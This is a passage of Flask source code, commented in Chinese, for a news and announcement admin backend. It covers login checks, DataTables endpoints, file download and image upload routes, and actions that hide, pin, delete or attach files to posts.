設置當需要登入要求時,預設轉址的頁面\nlogin_manager.init_app(app=app)\n\n\ndef get_current_datetime(): # 取得當前系統時間\n\n get_CurrentTime = dtime.datetime.now().strftime(time_format)\n\n # split_dtime = str(get_CurrentTime).split(\" \")\n\n # split_date = str(split_dtime[0]).split(\"-\") # 年 月 日\n # split_time = str(split_dtime[1]).split(\":\") # 時 分 秒\n\n split_date , split_time = get_current_splitdtime(get_CurrentTime)\n\n print(\"[get_current_datetime]Year: {} , Month: {} , Day: {}\".format(split_date[0],split_date[1],split_date[2]))\n print(\"[get_current_datetime]Hour: {} , Min: {} , Sec: {}\".format(split_time[0],split_time[1],split_time[2]))\n\n return get_CurrentTime\n\n\ndef get_current_splitdtime(dtime): # 取得分割的時間格式\n '''\n 分割時間格式為兩筆清單,分別為[年 月 日]與[時 分 秒]\n '''\n\n split_dtime = str(dtime).split(\" \")\n\n split_date = str(split_dtime[0]).split(\"-\") # 年 月 日\n split_time = str(split_dtime[1]).split(\":\") # 時 分 秒\n\n # print(\"[get_current_splitdtime]Year: {} , Month: {} , Day: {}\".format(split_date[0],split_date[1],split_date[2]))\n # print(\"[get_current_splitdtime]Hour: {} , Min: {} , Sec: {}\".format(split_time[0],split_time[1],split_time[2]))\n\n return split_date , split_time\n\n\ndef allowed_img_file(filename): # 允許的附件上傳圖片類型\n # print(\"filename.rsplit('.', 1)[1].lower(): {}\".format(filename.rsplit('.', 1)[1].lower()))\n return '.' in filename and \\\n str(filename.rsplit('.', 1)[1].lower()) in ALLOWED_IMAGE_EXTENSIONS\n\ndef allowed_file_file(filename): # 允許的附件上傳檔案類型\n # print(\"filename.rsplit('.', 1)[1].lower(): {}\".format(filename.rsplit('.', 1)[1].lower()))\n return '.' 
in filename and \\\n str(filename.rsplit('.', 1)[1].lower()) in ALLOWED_File_EXTENSIONS\n\n\ndef check_unable_page(get_page): # 驗證該網站頁面是否開放\n\n is_Unable = False\n\n if get_page in list_unable_page:\n\n is_Unable = True\n\n print(\"[check_unable_page]該網站[{}]目前不開放.\".format(get_page))\n\n else:\n\n is_Unable = False\n\n print(\"[check_unable_page]該網站[{}]目前開放.\".format(get_page))\n \n return is_Unable\n\n\ndef initialize_URL(): # 初始化URL參數\n\n list_URL = dict()\n\n list_URL['Home'] = url_for(\n 'admin', UID=session['UID'], UserName=session['UserName'])\n\n list_URL['news'] = url_for(\n 'news', UID=session['UID'],DPID=session['DPID'], UserName=session['UserName'],dplistClass=\"ALL\")\n\n list_URL['news_storagemanage'] = url_for(\n 'news_storagemanage', UID=session['UID'],DPID=session['DPID'], UserName=session['UserName'],dplistClass=\"ALL\")\n \n list_URL['editnews'] = url_for(\n 'editnews', UID=session['UID'], UserName=session['UserName'])\n \n list_URL['addnews'] = url_for(\n 'addnews', UID=session['UID'], UserName=session['UserName'])\n\n list_URL['logout'] = url_for('logout') \n\n return list_URL\n\n\ndef initialize_session(): # 初始化Session參數\n \n session.clear() # 清空所有Session\n\n\ndef verify_login_status(): # 驗證是否為登入核准狀態\n\n print(\"[verify_login_status]: verify time: {}\".format(get_current_datetime()))\n print(\"[verify_login_status]: session['UID']: {}\".format(session['UID']))\n print(\"[verify_login_status]: request.args.get('UID'): {}\".format(request.args.get('UID')))\n # print(\"session['UID']: {}\".format(session['UID']))\n print(\"[verify_login_status]: session['UserName']: {}\".format(session['UserName']))\n print(\"[verify_login_status]: request.args.get('UserName'): {}\".format(request.args.get('UserName')))\n # print(\"session['UserName']: {}\".format(session['UserName']))\n\n # 判斷URL是否沒有user參數 或 網頁參數user跟session不一致\n if (request.args.get('UID') is None or request.args.get('UID') != str(session['UID'])) or (request.args.get('UserName') is None or request.args.get('UserName') != session['UserName']):\n\n print(\"[verify_login_status]: 驗證到登入狀態異常.\")\n\n # 初始化Session參數\n initialize_session()\n\n if session['user_id'] != None:\n logout_user()\n\n return redirect(url_for('login'))\n\n\n@app.errorhandler(404)\ndef page_not_found(e): # 404 Not Foun頁面\n return render_template('NotFound404.html'), 404\n\n\n@app.route('/get_news_datatable', methods=['GET', 'POST'])\n@login_required\ndef get_news_datatable(): # 公告資訊Datatables呼叫請求資料\n\n # 驗證登入狀態是否異常\n verify_login_status()\n # ------------------------------------- 網頁初始化參數 ----------------------------------------------------\n\n # 取得網頁URL位址參數\n get_web_arg_DPID = request.args.get('DPID')\n get_web_arg_Class = request.args.get('Class')\n\n # print(\"[get_news_datatable]: get_web_arg_DPID: {}\".format(get_web_arg_DPID))\n # print(\"[get_news_datatable]: get_web_arg_Class: {}\".format(get_web_arg_Class)) \n\n # Datatables Server-side processing\n # https://datatables.net/manual/server-side#Returned-data\n # 取得當前datatables透過Ajax回傳的計數,用來做後端回傳資料驗證\n get_datatables_verifyCounter = request.form.get('draw')\n # 取得當前datatables透過Ajax回傳的頁面顯示筆數,用來做取查詢結果取出資料筆數\n get_showDataLength = request.form.get('length')\n # 取得當前datatables透過Ajax回傳的資料取用的開始位置,用來做取查詢結果取出資料位置起始值\n # Datatables 回傳的start參數起始值是從0開始\n get_startDataPosition = request.form.get('start')\n\n # print(\"[get_news_datatable]: get_datatables_verifyCounter: {}\".format(get_datatables_verifyCounter))\n # print(\"[get_news_datatable]: get_showDataLength: {}\".format(get_showDataLength))\n # 
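`allowed_img_file` and `allowed_file_file` in the record above implement the extension-whitelist check from the Flask upload docs it links. A standalone version follows; the allowed set here is illustrative, not the project's `Config` values.

```python
# Standalone extension-whitelist check in the style of the record above.
# The allowed set is an assumption; the original pulls it from Config.
ALLOWED_IMAGE_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}

def allowed_img_file(filename: str) -> bool:
    # Require a dot, then compare the lowercased final suffix.
    return ("." in filename
            and filename.rsplit(".", 1)[1].lower() in ALLOWED_IMAGE_EXTENSIONS)

assert allowed_img_file("photo.JPG")
assert not allowed_img_file("archive.tar.xz")   # final suffix is "xz"
assert not allowed_img_file("README")           # no extension at all
```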
print(\"[get_news_datatable]: get_startDataPosition: {}\".format(get_startDataPosition))\n\n json_result = jsonify(dict())\n\n # 判斷查詢的公告類別是否為查詢全部公告\n if get_web_arg_Class == \"ALL\":\n\n # 查詢所有的公告內容\n # 透過order_by()來進行排序,預設是asc()升級排序,這裡使用降級排序desc()\n # 透過offset()來指定取得第幾筆位置開始的資料\n # 透過limit()來指定要取幾筆資料出來\n select_news_all = News.query.filter_by(DPID = get_web_arg_DPID,hide_status = False).order_by(News.Createdate.desc()).offset(get_startDataPosition).limit(get_showDataLength).all()\n\n # 查詢所有的公告內容總筆數\n select_News_count = News.query.filter_by(DPID=get_web_arg_DPID,hide_status = False).count()\n\n else:\n\n # 查詢指定類別公告內容\n # 透過order_by()來進行排序,預設是asc()升級排序,這裡使用降級排序desc()\n # 透過offset()來指定取得第幾筆位置開始的資料\n # 透過limit()來指定要取幾筆資料出來\n select_news_all = News.query.filter_by(DPID = get_web_arg_DPID , Class = get_web_arg_Class,hide_status = False).order_by(News.Createdate.desc()).offset(get_startDataPosition).limit(get_showDataLength).all()\n\n # 查詢所有的公告內容總筆數\n select_News_count = News.query.filter_by(DPID = get_web_arg_DPID, Class = get_web_arg_Class,hide_status = False).count()\n\n data_list = list()\n\n # 讀取查詢結果資料清單\n for read_item in select_news_all:\n \n data = dict()\n\n data['NID'] = read_item.get_NID()\n data['Class'] = read_item.get_Class()\n data['Title'] = read_item.get_title()\n data['Createdate'] = str(read_item.get_Createdate()) \n\n # 判斷公告的隱藏狀態,如果是false代表公告不隱藏,如果是true代表公告隱藏\n if not read_item.get_hide_status():\n\n # data['hide_status'] = \"\"\n\n # 隱藏公告內容 按鈕\n hidestatus_news_button = \"\"\n\n # else:\n\n # data['hide_status'] = \"\"\n\n # # 顯示公告內容 按鈕\n # hidestatus_news_button = \"\"\n\n \n # 判斷公告是否置頂\n if read_item.get_Top():\n \n data['Top'] = \"\"\n \n # 移除公告置頂 按鈕\n change_Top_button = \"\"\n \n else:\n\n data['Top'] = \"未置頂\"\n\n # 設為公告置頂 按鈕\n change_Top_button = \"\"\n \n # 附件檔案管理 按鈕\n newsfilelist_button = \"\"\n \n # # 判斷公告的隱藏狀態,如果是false代表公告不隱藏,如果是true代表公告隱藏\n # if not read_item.get_hide_status():\n\n # data['hide_status'] = \"\"\n\n # # 隱藏公告內容 按鈕\n # hidestatus_news_button = \"\"\n\n # else:\n\n # data['hide_status'] = \"\"\n\n # # 顯示公告內容 按鈕\n # hidestatus_news_button = \"\"\n\n \n # delete_news_button = \"\"\n\n # 處理動作 按鈕\n data['action'] = edit_news_button + newsfilelist_button + change_Top_button + hidestatus_news_button\n\n data_list.append(data)\n\n # print(data_list)\n\n # 產生Json資料回傳給前端Datatables\n json_result = jsonify(dict(\n # 回傳驗證計數\n draw=get_datatables_verifyCounter,\n # 回傳資料總筆數\n recordsTotal=select_News_count,\n # 回傳資料總筆數,用在搜尋過濾上\n recordsFiltered=select_News_count,\n # 回傳查詢的資料結果\n data = data_list\n ))\n\n # print(\"[get_news_datatable]: json_result: {}\".format(json_result))\n\n return json_result\n \n\n@app.route('/get_news_storage_datatable', methods=['GET', 'POST'])\n@login_required\ndef get_news_storage_datatable(): # 公告資訊儲存狀態Datatables呼叫請求資料\n\n # 驗證登入狀態是否異常\n verify_login_status()\n # ------------------------------------- 網頁初始化參數 ----------------------------------------------------\n\n # 取得網頁URL位址參數\n get_web_arg_DPID = request.args.get('DPID')\n get_web_arg_Class = request.args.get('Class')\n\n # print(\"[get_news_storage_datatable]: get_web_arg_DPID: {}\".format(get_web_arg_DPID))\n # print(\"[get_news_storage_datatable]: get_web_arg_Class: {}\".format(get_web_arg_Class)) \n\n # Datatables Server-side processing\n # https://datatables.net/manual/server-side#Returned-data\n # 取得當前datatables透過Ajax回傳的計數,用來做後端回傳資料驗證\n get_datatables_verifyCounter = request.form.get('draw')\n # 取得當前datatables透過Ajax回傳的頁面顯示筆數,用來做取查詢結果取出資料筆數\n get_showDataLength = 
@app.route('/get_news_storage_datatable', methods=['GET', 'POST'])
@login_required
def get_news_storage_datatable():  # data source for the archived-news DataTable

    bad_login = verify_login_status()
    if bad_login:
        return bad_login

    # ------------------------------------- page parameters ----------------------------------------------------
    get_web_arg_DPID = request.args.get('DPID')
    get_web_arg_Class = request.args.get('Class')

    # DataTables server-side parameters (see get_news_datatable above)
    get_datatables_verifyCounter = request.form.get('draw')
    get_showDataLength = request.form.get('length')
    get_startDataPosition = request.form.get('start')

    # Same paging as get_news_datatable, but over hidden posts
    # (hide_status == True).
    if get_web_arg_Class == "ALL":
        select_news_all = News.query.filter_by(DPID=get_web_arg_DPID, hide_status=True).order_by(News.Createdate.desc()).offset(get_startDataPosition).limit(get_showDataLength).all()
        select_News_count = News.query.filter_by(DPID=get_web_arg_DPID, hide_status=True).count()
    else:
        select_news_all = News.query.filter_by(DPID=get_web_arg_DPID, Class=get_web_arg_Class, hide_status=True).order_by(News.Createdate.desc()).offset(get_startDataPosition).limit(get_showDataLength).all()
        select_News_count = News.query.filter_by(DPID=get_web_arg_DPID, Class=get_web_arg_Class, hide_status=True).count()

    data_list = list()

    for read_item in select_news_all:

        data = dict()
        data['NID'] = read_item.get_NID()
        data['Class'] = read_item.get_Class()
        data['Title'] = read_item.get_title()
        data['Createdate'] = str(read_item.get_Createdate())

        # restore/delete buttons; the markup is not included in this listing,
        # so empty placeholders are used
        if read_item.get_hide_status():
            hidestatus_news_button = ""
            delete_news_button = ""
            data['action'] = hidestatus_news_button + delete_news_button

        data_list.append(data)

    json_result = jsonify(dict(
        draw=get_datatables_verifyCounter,
        recordsTotal=select_News_count,
        recordsFiltered=select_News_count,
        data=data_list
    ))

    return json_result
{}\".format(get_startDataPosition))\n\n json_result = jsonify(dict())\n\n # 查詢所有的檔案附件\n # 透過order_by()來進行排序,預設是asc()升級排序,這裡使用降級排序desc()\n # 透過offset()來指定取得第幾筆位置開始的資料\n # 透過limit()來指定要取幾筆資料出來\n select_FileDownload_all = FileDownLoad.query.filter_by(DPID = get_web_arg_DPID).order_by(FileDownLoad.Createdate.desc()).offset(get_startDataPosition).limit(get_showDataLength).all()\n\n # 查詢所有的檔案附件總筆數\n select_FileDownload_count = FileDownLoad.query.filter_by(DPID=get_web_arg_DPID).count()\n\n data_list = list()\n \n # 讀取查詢結果資料清單\n for read_item in select_FileDownload_all:\n \n data = dict()\n\n data['FID'] = read_item.get_FID()\n data['title'] = read_item.get_title()\n data['Createdate'] = str(read_item.get_Createdate())\n\n '''修改檔案附件 按鈕'''\n edit_button = \"\"\n \n '''刪除師資內容 按鈕'''\n delete_button = \"\"\n\n download_button = \"下載檔案附件\"\n\n '''處理動作 按鈕'''\n # data['action'] = edit_button + manage_img_button + delete_button\n data['action'] = edit_button + download_button + delete_button\n\n data_list.append(data)\n\n # print(data_list)\n\n '''產生Json資料回傳給前端Datatables'''\n json_result = jsonify(dict(\n # 回傳驗證計數\n draw = get_datatables_verifyCounter,\n # 回傳資料總筆數\n recordsTotal = select_FileDownload_count,\n # 回傳資料總筆數,用在搜尋過濾上\n recordsFiltered = select_FileDownload_count,\n # 回傳查詢的資料結果\n data = data_list\n ))\n\n # print(\"[get_filedownload_datatable]: json_result: {}\".format(json_result))\n\n return json_result\n\n\n@app.route('/download/')\ndef download_files(filename): # 瀏覽後端下載指定檔案\n\n path = app.config['DOWNLOAD_FILEFOLDER']\n # gen_download_path = send_from_directory(path, filename)\n\n print(\"[download_files]: Start Download {} : {}\".format(filename,send_from_directory(path, filename)))\n\n # 回傳指定的檔案實體下載\n return send_from_directory(path, filename.encode('utf-8').decode('utf-8'),as_attachment=True)\n\n\n@app.route('/ckuploadimg/')\ndef uploaded_files(filename): # 產生上傳指定的圖片路徑\n \n path = app.config['CKEDITOR_UPLOADED_PATH']\n gen_path = send_from_directory(path, filename.encode('utf-8').decode('utf-8'))\n\n # print(\"gen_path: {}\".format(gen_path))\n\n return gen_path\n\n\n@app.route(\"/ckupload\", methods=['GET', 'POST'])\ndef ckupload(): # Ckeditor 上傳圖片功能\n \n file = request.files['upload'] # Ckeditor image upload img file\n print(\"File: {}\".format(file))\n\n extension = file.filename.split('.') # 切割檔案名稱與類型\n print(\"Extension: {}\".format(extension))\n\n filetype = extension[1].lower() # 取得檔案類型\n print(\"File Type: {}\".format(filetype))\n\n if filetype not in ALLOWED_IMAGE_EXTENSIONS: # 驗證圖片類型\n\n print(\"{} 不支援的圖片類型\".format(file.filename))\n return upload_fail(message='[{}] 不支援的圖片類型,圖片類型要求\"jpg\"、\"png\"!'.format(file.filename)) # 返回upload_fail调用\n\n # 重新命名檔名\n re_filename = \"f\" + str(dtime.datetime.now().strftime(time_format_ckupload_img))\n\n print(\"Re_filename: {}\".format(re_filename))\n \n # 儲存圖片本體至app.config['CKEDITOR_UPLOADED_PATH']所設定的位址\n file.save(os.path.join(app.config['CKEDITOR_UPLOADED_PATH'], re_filename))\n\n # 呼叫uploaded_files方法取得圖片Path,但前端顯示的資訊不會是圖片Path,而是uploaded_files所對應的app.route()內所設置的URL\n url = url_for(\"uploaded_files\", filename=re_filename)\n\n print(\"Image URL: {}\".format(url))\n\n return upload_success(url=url) \n\n# ------------------------------------------- 網站頁面 -------------------------------------------\n@app.route(\"/helloworld\")\ndef helloworld(): # 秀出helloworld訊息頁面\n\n return \"helloworld\"\n\n\n@app.route(\"/admin\", methods=['GET', 'POST'])\n@login_required\ndef admin(): # 後台系統首頁\n\n # 驗證登入狀態是否異常\n verify_login_status()\n\n # 初始化URL\n 
# ------------------------------------------- site pages -------------------------------------------
@app.route("/helloworld")
def helloworld():  # plain hello-world page

    return "helloworld"


@app.route("/admin", methods=['GET', 'POST'])
@login_required
def admin():  # back-office home page

    bad_login = verify_login_status()
    if bad_login:
        return bad_login

    list_URL = initialize_URL()

    Http_Title = "後台管理系統"

    # currently logged-in user, from the User table
    result = User_Admin.query.filter_by(
        UID=session['UID'], UserName=session['UserName']).first()

    return render_template('index.html', Http_Title=Http_Title,
                           UID=session['UID'], UserName=session['UserName'],
                           dp=session['DP'],
                           list_URL=list_URL)
# ------------------------------------------- news management -------------------------------------------
@app.route("/news", methods=['GET', 'POST'])
@login_required
def news():  # news listing page

    bad_login = verify_login_status()
    if bad_login:
        return bad_login

    # is this page currently enabled?
    is_Unable = check_unable_page("news")

    # ------------------------------------- page parameters ----------------------------------------------------
    list_URL = initialize_URL()

    Http_Title = "後台公告資訊列表"

    get_web_arg_dplistClass = request.args.get('dplistClass')

    # ------------------------------------- AJAX handling ---------------------------------------------------
    if request.method == 'POST':

        data = request.get_json(force=True)

        # 'action' selects which operation the front end is asking for
        get_js_action = data['action']

        if get_js_action == "startTop":  # pin a post

            Top_change_status = False
            top_err_log = ""

            get_js_NID = data['NID']
            get_js_top = data['top']
            get_js_dplistClass = data['dplistClass']

            get_News = News.query.filter_by(NID=int(get_js_NID)).first()

            if get_News.get_NID() is not None:
                get_News.Top = get_js_top
                db.session.commit()

            # re-query to confirm the flag was written
            select_News = News.query.filter_by(NID=int(get_js_NID), Top=get_js_top).count()
            print("select_News: {} {}".format(select_News, News.query.filter_by(NID=int(get_js_NID)).first().get_Top()))

            if select_News != 0:
                Top_change_status = True
                top_err_log = "公告置頂成功."
            else:
                Top_change_status = False
                top_err_log = "公告置頂失敗."

            return jsonify(dict(redirect=url_for('news', UID=session['UID'], DPID=session['DPID'], UserName=session['UserName'], dplistClass=get_js_dplistClass), Top_change_status=Top_change_status, top_err_log=top_err_log))

        if get_js_action == "stopTop":  # unpin a post

            Top_change_status = False
            top_err_log = ""

            get_js_NID = data['NID']
            get_js_top = data['top']
            get_js_dplistClass = data['dplistClass']

            get_News = News.query.filter_by(NID=int(get_js_NID)).first()

            if get_News.get_NID() is not None:
                get_News.Top = get_js_top
                db.session.commit()

            select_News = News.query.filter_by(NID=int(get_js_NID), Top=get_js_top).count()

            if select_News != 0:
                Top_change_status = True
                top_err_log = "公告已移除置頂."
            else:
                Top_change_status = False
                top_err_log = "公告移除置頂失敗."

            return jsonify(dict(redirect=url_for('news', UID=session['UID'], DPID=session['DPID'], UserName=session['UserName'], dplistClass=get_js_dplistClass), Top_change_status=Top_change_status, top_err_log=top_err_log))

        if get_js_action == "hidenews":  # hide (archive) a post

            hide_change_status = False
            hide_err_log = "None"

            get_js_NID = data['NID']
            get_js_dplistClass = data['dplistClass']

            get_News = News.query.filter_by(NID=int(get_js_NID)).first()

            # only proceed when the post id resolved to a record
            if get_News.get_NID() is not None:

                try:
                    get_News.hide_status = True  # True means the post is hidden
                    db.session.commit()

                    hide_change_status = True
                    hide_err_log = "公告隱藏成功."

                except exc.SQLAlchemyError as SQLError:
                    db.session.rollback()  # undo the pending write
                    print("[admin_new]: hide news SQLError: {}".format(SQLError))

                    hide_change_status = False
                    hide_err_log = "公告隱藏失敗."

            return jsonify(dict(redirect=url_for('news', UID=session['UID'], DPID=session['DPID'], UserName=session['UserName'], dplistClass=get_js_dplistClass), hide_change_status=hide_change_status, hide_err_log=hide_err_log))

        if get_js_action == "shownews":  # unhide a post

            show_change_status = False
            show_err_log = "None"

            get_js_NID = data['NID']
            get_js_dplistClass = data['dplistClass']

            get_News = News.query.filter_by(NID=int(get_js_NID)).first()

            if get_News.get_NID() is not None:

                print("{}".format(get_News.get_hide_status()))

                try:
                    get_News.hide_status = False  # False means the post is visible
                    db.session.commit()

                    show_change_status = True
                    show_err_log = "公告顯示成功."

                except exc.SQLAlchemyError as SQLError:
                    db.session.rollback()

                    show_change_status = False
                    show_err_log = "公告顯示失敗."

            return jsonify(dict(redirect=url_for('news', UID=session['UID'], DPID=session['DPID'], UserName=session['UserName'], dplistClass=get_js_dplistClass), show_change_status=show_change_status, show_err_log=show_err_log))

    return render_template('news.html', Http_Title=Http_Title, UID=session['UID'], UserName=session['UserName'],
                           DPID=session['DPID'],
                           is_Unable=is_Unable,
                           list_news_class=list_news_class,
                           dplistClass=get_web_arg_dplistClass,
                           list_URL=list_URL)
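# A sketch of the AJAX contract the view above expects, assuming the page's
# JavaScript (not shown in this file) posts JSON like
#
#   {"action": "hidenews", "NID": "7", "dplistClass": "ALL"}
#
# and handles navigation itself using the reply:
#
#   {"redirect": "/news?UID=...&dplistClass=ALL",
#    "hide_change_status": true, "hide_err_log": "..."}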
{}\".format(get_News.get_NID(),get_News.get_title(),get_current_datetime()))\n \n # 判斷是否取得的公告編號是否不為Nonetype\n if get_News.get_NID() != None:\n \n # 取得公告附件數量\n check_Newsfile = NewsFile.query.filter_by(NID=get_News.get_NID()).count()\n\n list_file_path = list()\n \n try:\n\n # 判斷公告數量是否不為0,代表有附件\n if check_Newsfile != 0:\n\n # 取得公告附件資訊\n select_newsfile_result = NewsFile.query.filter_by(NID=get_News.get_NID()) \n \n # 讀取公告附件清單\n for read_item in select_newsfile_result:\n\n print(\"news file: {} , path: {}\".format(read_item.get_File(), read_item.get_FilePosition()))\n\n file_path = os.path.join(currentPath,app.config['UPLOAD_FILEFOLDER'],read_item.get_FilePosition())\n \n # 判斷檔案是否存在\n if os.path.exists(file_path):\n\n # print(\"[ {} ] 檔案存在.\".format(file_path))\n\n os.remove(file_path) # 移除檔案\n\n # 刪除公告附件紀錄\n db.session.delete(read_item)\n \n # 移除公告\n db.session.delete(get_News)\n \n # 寫入資料庫\n db.session.commit()\n\n delete_change_staus = True\n\n delete_err_log = \"公告移除成功.\"\n\n except exc.SQLAlchemyError as SQLError:\n \n # 回復寫入資料庫之前狀態\n db.session.rollback()\n\n print(\"[admin_news_storagemanage]: hide news SQLError: {}\".format(SQLError._message))\n \n delete_change_staus = False\n delete_err_log = \"公告移除失敗.\"\n\n return jsonify(dict(redirect = url_for('news_storagemanage',UID=session['UID'],DPID=session['DPID'], UserName=session['UserName'],dplistClass=get_js_dplistClass), delete_change_staus = delete_change_staus,delete_err_log=delete_err_log))\n\n return jsonify(dict(redirect = url_for('news_storagemanage',UID=session['UID'],DPID=session['DPID'], UserName=session['UserName'],dplistClass=get_js_dplistClass), delete_change_staus = delete_change_staus,delete_err_log=delete_err_log))\n\n\n if get_js_action == \"shownews\": # 還原公告\n \n show_change_staus = False\n show_err_log = \"None\"\n\n # 取得Ajax傳遞過來參數\n get_js_NID = data['NID']\n get_js_dplistClass = data['dplistClass'] \n\n # 取得指定的公告主體\n get_News = News.query.filter_by(NID=int(get_js_NID)).first()\n\n # print(\"[admin_news_storagemanage]: 還原公告 NID: {} , title: {} , {}\".format(get_News.get_NID(),get_News.get_title(),get_current_datetime()))\n\n # 判斷是否取得的公告編號是否不為Nonetype\n if get_News.get_NID() != None: \n\n print(\"{}\".format(get_News.get_hide_status()))\n\n try:\n\n # 更改公告的遮蔽狀態參數\n get_News.hide_status = False # 如果是false代表公告不隱藏 \n\n # 寫入資料庫\n db.session.commit() \n\n show_change_staus = True\n\n show_err_log = \"公告還原成功.\"\n\n except exc.SQLAlchemyError as SQLError:\n \n # 回復寫入資料庫之前狀態\n db.session.rollback()\n\n print(\"[admin_news_storagemanage]: show news SQLError: {}\".format(SQLError._message))\n \n show_change_staus = False\n\n show_err_log = \"公告還原失敗.\"\n\n return jsonify(dict(redirect = url_for('news_storagemanage',UID=session['UID'],DPID=session['DPID'], UserName=session['UserName'],dplistClass=get_js_dplistClass), show_change_staus = show_change_staus,show_err_log=show_err_log))\n\n return jsonify(dict(redirect = url_for('news_storagemanage',UID=session['UID'],DPID=session['DPID'], UserName=session['UserName'],dplistClass=get_js_dplistClass), show_change_staus = show_change_staus,show_err_log=show_err_log))\n\n\n return render_template('news_storagemanage.html', Http_Title=Http_Title, UID=session['UID'], UserName=session['UserName'],\n DPID = session['DPID'],\n is_Unable=is_Unable,\n list_news_storagemanage_class = list_news_storagemanage_class,\n dplistClass = get_web_arg_dplistClass, \n list_URL = list_URL)\n\n\n@app.route(\"/newsfilelist\", methods=['GET', 'POST'])\n@login_required\ndef newsfilelist(): # 公告附件管理頁面\n\n # 
@app.route("/newsfilelist", methods=['GET', 'POST'])
@login_required
def newsfilelist():  # news-attachment management page

    bad_login = verify_login_status()
    if bad_login:
        return bad_login

    is_Unable = check_unable_page("newsfilelist")

    # ------------------------------------- page parameters ----------------------------------------------------
    list_URL = initialize_URL()

    Http_Title = "後台公告附件管理"

    '''department record of the current session'''
    select_DP = DP.query.filter_by(DPID=session['DPID']).first()

    get_web_arg_news_NID = request.args.get('NID')
    get_web_arg_news_Class = request.args.get('Class')
    get_web_arg_news_Title = request.args.get('Title')
    get_web_arg_dplistClass = request.args.get('dplistClass')

    print("[admin_newsfilelist]: get_web_arg_dplistClass: {}".format(get_web_arg_dplistClass))

    # ------------------------------------- AJAX handling ---------------------------------------------------
    if request.method == 'POST':

        # silent=True: multipart file uploads carry no JSON body, so data is None
        data = request.get_json(force=True, silent=True)

        if data is not None and data['action'] == 'deleteNewsfile':  # delete one attachment

            delete_change_status = False
            delete_err_log = ""

            get_js_NID = data['NID']      # news id
            get_js_Title = data['Title']  # news title
            get_js_NFID = data['NFID']    # attachment id
            get_js_File = data['File']    # attachment file name

            # is the attachment recorded in the database?
            if NewsFile.query.filter_by(NFID=int(get_js_NFID), File=get_js_File).count() != 0:

                get_newsfile = NewsFile.query.filter_by(NFID=int(get_js_NFID), File=get_js_File).first()

                # physical location of the attachment
                gen_newsfile_path = os.path.join(currentPath, app.config['DOWNLOAD_FILEFOLDER'], get_newsfile.get_FilePosition())

                if os.path.exists(gen_newsfile_path):

                    os.remove(gen_newsfile_path)

                    # once the file is gone, drop the record as well
                    if not os.path.exists(gen_newsfile_path):

                        db.session.delete(get_newsfile)
                        db.session.commit()

                        if NewsFile.query.filter_by(NFID=int(get_js_NFID), File=get_js_File).count() == 0:
                            delete_change_status = True

                else:
                    delete_change_status = False
                    delete_err_log = "附件檔案不存在."

            else:
                delete_change_status = False
                delete_err_log = "附件檔案紀錄不存在."

            return jsonify(dict(redirect=url_for('newsfilelist', UID=session['UID'], UserName=session['UserName'], NID=get_js_NID, Class=get_web_arg_news_Class, Title=get_js_Title, dplistClass=get_web_arg_dplistClass), delete_change_status=delete_change_status, delete_err_log=delete_err_log))
        elif data is None:  # multipart upload of new attachments

            update_change_status = True
            err_log = ""

            # files selected in the front-end form
            form_files = request.files.getlist("files[]")

            print("[admin_newsfilelist]: select file quantity: {}".format(len(form_files)))

            if len(form_files) != 0:

                # root directory for this news class
                img_save_dir = os.path.join(app.config['UPLOAD_FILEFOLDER'], get_web_arg_news_Class)

                is_repeat_filename = False

                # first pass: reject the whole batch on any duplicate name
                for read_file in form_files:

                    print("[admin_newsfilelist] 檔案:{}".format(read_file.filename))

                    # secure_filename() sanitises the name; note it drops
                    # non-ASCII characters, see
                    # http://www.voidcn.com/article/p-cxjdqemb-bpc.html
                    filename = secure_filename(read_file.filename)

                    check_newsfile_exist = NewsFile.query.filter_by(NID=get_web_arg_news_NID, File=filename).count()

                    print("[admin_newsfilelist] 檢查{}是否有重複,查詢筆數:{}".format(filename, check_newsfile_exist))

                    if check_newsfile_exist != 0:

                        is_repeat_filename = True
                        update_change_status = False
                        err_log = "[系統警告]發現附件檔案重複上傳\n檔案名稱:{}\n本次操作系統不予新增檔案,請在重新確認所選擇附件檔案。".format(filename)

                        print("[admin_newsfilelist] 部門編號: {} , 部門: {} 附件檔案重複上傳[{}],不予執行新增程序".format(
                            select_DP.get_DPID(),
                            select_DP.get_DP(),
                            filename
                        ))

                        break

                ''' is_repeat_filename stays False when no duplicates were found '''
                if not is_repeat_filename:

                    print("[admin_newsfilelist]執行新增圖片程序")

                    # make sure the class directory exists
                    if not os.path.isdir(img_save_dir):
                        try:
                            os.makedirs(img_save_dir)
                        except FileExistsError:  # created concurrently
                            print("[admin_newsfilelist]: [ {} ]目錄已存在。".format(img_save_dir))

                    # ... and the per-department subdirectory below it
                    if not os.path.isdir(os.path.join(img_save_dir, select_DP.get_DP())):
                        try:
                            os.makedirs(os.path.join(img_save_dir, select_DP.get_DP()))
                        except FileExistsError:
                            print("[admin_newsfilelist]: [ {} ]目錄已存在。".format(os.path.join(img_save_dir, select_DP.get_DP())))

                    # second pass: save the files and record them
                    for read_file in form_files:

                        print("[admin_newsfilelist]: FileName: {}".format(read_file.filename))

                        filename = secure_filename(read_file.filename)

                        file_path = os.path.join(img_save_dir, select_DP.get_DP(), filename)

                        print("[ {} ]檔案存放路徑: {}".format(filename, file_path))

                        read_file.save(file_path)

                        # record the attachment
                        db.session.add(NewsFile(NID=int(get_web_arg_news_NID), File=filename, FilePosition=os.path.join(get_web_arg_news_Class, select_DP.get_DP(), filename)))

                        db.session.commit()

                    update_change_status = True

                    return jsonify(dict(redirect=url_for('newsfilelist', UID=session['UID'], UserName=session['UserName'], NID=get_web_arg_news_NID, Class=get_web_arg_news_Class, Title=get_web_arg_news_Title, dplistClass=get_web_arg_dplistClass), update_change_status=update_change_status, err_log=err_log))

                else:

                    print("[admin_newsfilelist]不予執行新增圖片程序")

                    return jsonify(dict(redirect=url_for('newsfilelist', UID=session['UID'], UserName=session['UserName'], NID=get_web_arg_news_NID, Class=get_web_arg_news_Class, Title=get_web_arg_news_Title, dplistClass=get_web_arg_dplistClass), update_change_status=update_change_status, err_log=err_log))
    # ------------------------------------- page content ----------------------------------------------------
    select_NewsFile_result = NewsFile.query.filter_by(NID=int(get_web_arg_news_NID))

    list_NewsFile_all = list()

    for read_item in select_NewsFile_result:

        dict_newsfile = dict()

        # only list attachments whose file actually exists on disk
        if os.path.exists(os.path.join(currentPath, app.config['DOWNLOAD_FILEFOLDER'], read_item.get_FilePosition())):

            dict_newsfile['NFID'] = read_item.get_NFID()  # attachment id (NFID)
            dict_newsfile['File'] = read_item.get_File()  # file name (File)
            dict_newsfile['downloadURL'] = url_for('download_files', filename=read_item.get_FilePosition())  # location (FilePosition)

            list_NewsFile_all.append(dict_newsfile)

